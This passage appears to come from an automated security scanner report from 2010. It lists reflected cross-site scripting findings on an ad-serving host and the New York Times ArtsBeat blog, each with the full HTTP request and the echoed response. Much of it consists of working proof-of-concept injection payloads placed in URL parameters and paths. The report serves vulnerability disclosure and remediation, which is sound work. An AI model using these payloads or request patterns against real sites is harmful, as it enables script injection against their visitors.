GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6747

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The scanner attributes this finding to the sz request parameter, but in the request below sz=728x90 is unchanged: the payload 12262'-alert(1)-'e4bd8929211 is appended to the type=goto value that opens the query string of the click URL carried in the path. That value is copied into a JavaScript string which is encapsulated in single quotation marks, and the input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5
...[SNIP]...

3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The scanner attributes this finding to the sz request parameter, but in the request below sz=728x90 is unchanged: the payload a865b"-alert(1)-"c0215a18d89 is appended to the type=goto value that opens the query string of the click URL carried in the path. That value is copied into a JavaScript string which is encapsulated in double quotation marks, and the input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5
...[SNIP]...

3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5739.NYTimes.com/B4990972.8

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0f6d'-alert(1)-'682c6ac4a6b was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5739.NYTimes.com/B4990972.8;click=d0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 489
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 13 Nov 2010 01:48:43 GMT
Expires: Sat, 13 Nov 2010 01:48:43 GMT

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/f7/%2a/i;44306;0-0;0;56070716;1-468/60;0/0/0;;~sscs=%3fd0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0
...[SNIP]...

3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51dfc"><script>alert(1)</script>7dc7045992c was submitted in the src parameter. This input was echoed as 51dfc\"><script>alert(1)</script>7dc7045992c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/anatomy-of-a-scene-unstoppable/?src=dayp51dfc"><script>alert(1)</script>7dc7045992c HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.nytimes.com/

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:51:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 71408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;anatomy-of-a-scene;chris-pine;denzel-washington;movies;tony-scott;unstoppable&src=dayp51dfc\"><script>alert(1)</script>7dc7045992c">
...[SNIP]...

3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c201f"><script>alert(1)</script>e276354bf82 was submitted in the src parameter. This input was echoed as c201f\"><script>alert(1)</script>e276354bf82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?src=twrc201f"><script>alert(1)</script>e276354bf82 HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.nytimes.com/timeswire/index.html?src=hp1-0-R

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:48:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
Now4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;featured;hip-hop;kanye-west;matt-lauer;music;television;today&src=twrc201f\"><script>alert(1)</script>e276354bf82">
...[SNIP]...

3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 521ab"><script>alert(1)</script>70bd4e176f0 was submitted in the src parameter. This input was echoed as 521ab\"><script>alert(1)</script>70bd4e176f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-week-in-culture-pictures-nov-12/?src=twr521ab"><script>alert(1)</script>70bd4e176f0 HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;arts-general;week-in-culture-pictures&src=twr521ab\"><script>alert(1)</script>70bd4e176f0">
...[SNIP]...

3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/art-design/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9f6"><script>alert(1)</script>58f86990e4f was submitted in the REST URL parameter 2. This input was echoed as 1e9f6\"><script>alert(1)</script>58f86990e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/art-design1e9f6"><script>alert(1)</script>58f86990e4f/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/art-design1e9f6\"><script>alert(1)</script>58f86990e4f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/arts-general/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70f0"><script>alert(1)</script>c5a9dd137e4 was submitted in the REST URL parameter 2. This input was echoed as f70f0\"><script>alert(1)</script>c5a9dd137e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/arts-generalf70f0"><script>alert(1)</script>c5a9dd137e4/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/arts-generalf70f0\"><script>alert(1)</script>c5a9dd137e4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/books/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2af69"><script>alert(1)</script>bb647269876 was submitted in the REST URL parameter 2. This input was echoed as 2af69\"><script>alert(1)</script>bb647269876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/books2af69"><script>alert(1)</script>bb647269876/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/books2af69\"><script>alert(1)</script>bb647269876&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/classical-music/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd77"><script>alert(1)</script>6d4e36739ac was submitted in the REST URL parameter 2. This input was echoed as ddd77\"><script>alert(1)</script>6d4e36739ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/classical-musicddd77"><script>alert(1)</script>6d4e36739ac/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/classical-musicddd77\"><script>alert(1)</script>6d4e36739ac&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/dance/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0f7"><script>alert(1)</script>7745ad10317 was submitted in the REST URL parameter 2. This input was echoed as ad0f7\"><script>alert(1)</script>7745ad10317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dancead0f7"><script>alert(1)</script>7745ad10317/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/dancead0f7\"><script>alert(1)</script>7745ad10317&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/featured/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4f4"><script>alert(1)</script>618049fbd12 was submitted in the REST URL parameter 2. This input was echoed as 8e4f4\"><script>alert(1)</script>618049fbd12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/featured8e4f4"><script>alert(1)</script>618049fbd12/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/featured8e4f4\"><script>alert(1)</script>618049fbd12&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/movies/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d062"><script>alert(1)</script>621d42481fe was submitted in the REST URL parameter 2. This input was echoed as 8d062\"><script>alert(1)</script>621d42481fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/movies8d062"><script>alert(1)</script>621d42481fe/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:06 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/movies8d062\"><script>alert(1)</script>621d42481fe&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
